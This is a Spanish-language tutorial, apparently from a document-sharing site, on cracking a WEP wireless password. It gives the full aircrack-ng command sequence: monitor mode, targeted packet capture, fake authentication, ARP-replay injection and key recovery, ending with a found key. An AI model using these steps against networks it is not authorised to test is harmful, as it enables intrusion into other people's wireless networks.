crackes.docx

9
Iniciando El Ataque Con Backtrack El siguiente paso es preparar nuestra tarjeta de red inalambrica para ello lo primero que hay que hacer es abrir una terminal y usar el comando airmon-ng Aquí podemos ver nuestras tarjetas de red. Comúnmente la que utilizaremos es wlan0 pero también puede ser ath0 u alguna otra cosa. Lo siguiente es poner la tarjeta en modo monitor, para ello hay que utilizar el comando airmon-ng start wlan0 En donde wlan0 es nuestra interfaz de red. Como podemos ver el modo monitor se activó en la interfaz mon0 que es la que utilizaremos de ahora en adelante.

Upload: eduardo-ortega

Post on 17-Jan-2016

216 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: crackes.docx

Iniciando El Ataque Con Backtrack

El siguiente paso es preparar nuestra tarjeta de red inalambrica para ello lo primero que hay que hacer es abrir una terminal y usar el comando

airmon-ng

Aquí podemos ver nuestras tarjetas de red. Comúnmente la que utilizaremos es wlan0 pero también puede ser ath0 u alguna otra cosa.

Lo siguiente es poner la tarjeta en modo monitor, para ello hay que utilizar el comando 

airmon-ng start wlan0

En donde wlan0 es nuestra interfaz de red. Como podemos ver el modo monitor se activó en la interfaz mon0 que es la que utilizaremos de ahora en adelante.

Page 2: crackes.docx

El siguiente paso es escanear las redes disponibles, para ello utilizaremos el comando 

airodump-ng mon0

donde

mon0 es nuestra interfaz de red

y obtendremos lo siguiente:

Page 3: crackes.docx

Después de un rato hay que presionar Ctrl+c para detenerlo. Hay que anotar el canal, y la dirección MAC (BSSID) pues la utilizaremos más adelante.

El siguiente paso es comenzar a capturar los paquetes de la red, para ello utilizaremos el comando

airodump-ng -c 1 --bssid 98:2C:BE:D8:E6:22 -w crackwep mon0

donde:

-c = Canal en donde está la red--bssid = Dirección Mac de la red-w = Nombre del archivo en donde se guardaran los paquetesmon0 = Nuestra interfaz de red

Y aparecerá una ventana parecida a la anterior, pero ahora sólo aparecerá dicha red y se estarán guardando los datos en un archivo en la carpeta root.

Page 4: crackes.docx

Lo siguente es abrir una nueva pestaña en la terminal y hacer una falsa autentificación para poder inyectar paquetes más adelante. En esta nueva pestaña utilizaremos el comando

aireplay-ng -1 0 -a 98:2C:BE:D8:E6:22 mon0

Donde:

-1 = Flag de aireplay para la falsa autentificación, el 0 indica cada cuando se hace la falsa autentificación.-a = MAC de la red.mon0 = Nuestra interfaz de red.

Aparecerá algo así:

Page 5: crackes.docx

El siguiente paso es capturar peticiones ARP e inyectarlas para generar paquetes que nos serviran para crackear el pass. Para ello utilizaremos el comando

aireplay-ng -3 -b 98:2C:BE:D8:E6:22 mon0

Donde:

-3 = Flag de aireplay para capturar y reenviar peticiones ARP-b = MAC de la redmon0 = Nuestra interfaz de red

y debe aparecer lo siguiente:

Page 6: crackes.docx

Que después de unos minutos debe comenzar a capturar paquetes ARP:

En la siguiente imagen podemos ver como aumentan los Iv's que son los que necesitamos para

Page 7: crackes.docx

crackear la pass WEP y aparecen como #Data en la pestaña de airodupm-ng:

Normalmente con 5000 Iv's podemos comenzar a desencriptar la clave, pero con unos 20000 es un poco más seguro, en este caso ya tenemos 18000 y aumentando por lo que ya podemos utilizar aircrack-ng. Para esto vamos a utilizar el domando

ls

Page 8: crackes.docx

Aquí podemos ver los archivos que tenemos en la carpeta root, como podemos ver están los archivos de captura que he tomado para el tutorial así como algunos otros, de aquí el que nos servira es el de crackwep-01.cap Que regresando un poco fue el nombre que le dimos al utilizar en airodump-ng la opción -w, pero sólo habiamos puesto crackwep, es por eso que utilizamos el camndo "ls"

El archivo que utilizaremos siempre será el que tenga la extensión .capAhora que tenemos el nombre, llego la hora de usar aircrack-ng, para esto usaremos el comando

aircrack-ng crackwep-01.cap

Donde:

crackwep-01.cap es el nombre del archivo que creamos con airodump-ng y en donde se guardan los paquetes. Entonces aparecerá algo así;

Page 9: crackes.docx

  

Como podemos ver, tuvimos los Iv's suficientes y la clave a parece a un lado de KEY FOUND y aparece entre corchetes; la clave seria "0701714181"

Y bueno eso fue todo :)

Este tutorial es diseñado para su funcionamiento cuando hay alguien conectado a la red, de otra manera será un poco más complicado. Son otros dos métodos utilizando también aircrack, y espero poder subir el tutorial la próxima semana, el problema es que mi módem sólo es vulnerable a este tipo de ataques pero espero conseguir otro para el tutorial.

Recordemos que hay modems con mayor seguridad que otros y durante el tutorial se pueden encontrar problemas como en la falsa autentificación. Algunos modems tienen un filtro MAC el cual sólo permite conectarse a las direcciones que introduzcas en el mediante su interfaz.

También es necesario tener buena señal, de otra manera habrá un poco más de dificultades pero es un hecho que el tutorial funciona.